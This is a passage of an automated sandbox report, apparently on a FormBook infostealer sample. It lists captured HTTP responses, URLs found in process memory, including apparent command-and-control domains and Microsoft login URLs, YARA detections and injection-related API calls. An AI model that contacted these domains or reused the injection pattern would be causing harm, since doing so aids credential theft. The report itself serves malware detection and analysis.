                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 02:27:23 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 02:27:26 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: waitfor.exe, 00000007.00000002.3813572544.00000000044F1000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710385375.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1949830012.0000000001B1C000.00000004.80000000.00040000.00000000.sdmp, suBpo1g13Q.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: waitfor.exe, 00000007.00000002.3813572544.00000000044F1000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710385375.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1949830012.0000000001B1C000.00000004.80000000.00040000.00000000.sdmp, suBpo1g13Q.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/8934/rcomlogo.jpg
                Source: waitfor.exe, 00000007.00000002.3813572544.00000000044F1000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710385375.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1949830012.0000000001B1C000.00000004.80000000.00040000.00000000.sdmp, suBpo1g13Q.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Jcsa.info
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Best_Online_University.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0i
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iOjPH20
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Course_Descriptions.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iOjP
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Japanese_Language_School.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/University_of_Toronto.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iO
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/display.cfm
                Source: iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.000000000354E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBY
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.register.com/?trkID=WSTm3u15CW
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.register.com?trkID=WSTm3u15CW
                Source: iBkWOgpZKSoi.exe, 00000008.00000002.3816364731.0000000004E43000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zkdamdjj.shop
                Source: iBkWOgpZKSoi.exe, 00000008.00000002.3816364731.0000000004E43000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zkdamdjj.shop/swhs/
                Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: waitfor.exe, 00000007.00000002.3815889613.000000000571A000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.000000000322A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://down-sz.trafficmanager.net/?hh=
                Source: iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld211
                Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: waitfor.exe, 00000007.00000003.1826248532.0000000007A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: waitfor.exe, 00000007.00000002.3813572544.00000000044F1000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710385375.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1949830012.0000000001B1C000.00000004.80000000.00040000.00000000.sdmp, suBpo1g13Q.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.register.com/whois.rcmx?domainName=Jcsa.info

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.suBpo1g13Q.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.suBpo1g13Q.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1637335809.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3813776931.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3813875432.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3813882427.00000000022E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1638525330.00000000017C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0042CFC3 NtClose,4_2_0042CFC3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0040AE71 NtResumeThread,4_2_0040AE71
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2B60 NtClose,LdrInitializeThunk,4_2_014E2B60
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_014E2DF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_014E2C70
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E35C0 NtCreateMutant,LdrInitializeThunk,4_2_014E35C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E4340 NtSetContextThread,4_2_014E4340
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E4650 NtSuspendThread,4_2_014E4650
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2BE0 NtQueryValueKey,4_2_014E2BE0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2BF0 NtAllocateVirtualMemory,4_2_014E2BF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2B80 NtQueryInformationFile,4_2_014E2B80
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2BA0 NtEnumerateValueKey,4_2_014E2BA0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2AD0 NtReadFile,4_2_014E2AD0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2AF0 NtWriteFile,4_2_014E2AF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2AB0 NtWaitForSingleObject,4_2_014E2AB0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2D00 NtSetInformationFile,4_2_014E2D00
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2D10 NtMapViewOfSection,4_2_014E2D10
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2D30 NtUnmapViewOfSection,4_2_014E2D30
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2DD0 NtDelayExecution,4_2_014E2DD0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2DB0 NtEnumerateKey,4_2_014E2DB0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2C60 NtCreateKey,4_2_014E2C60
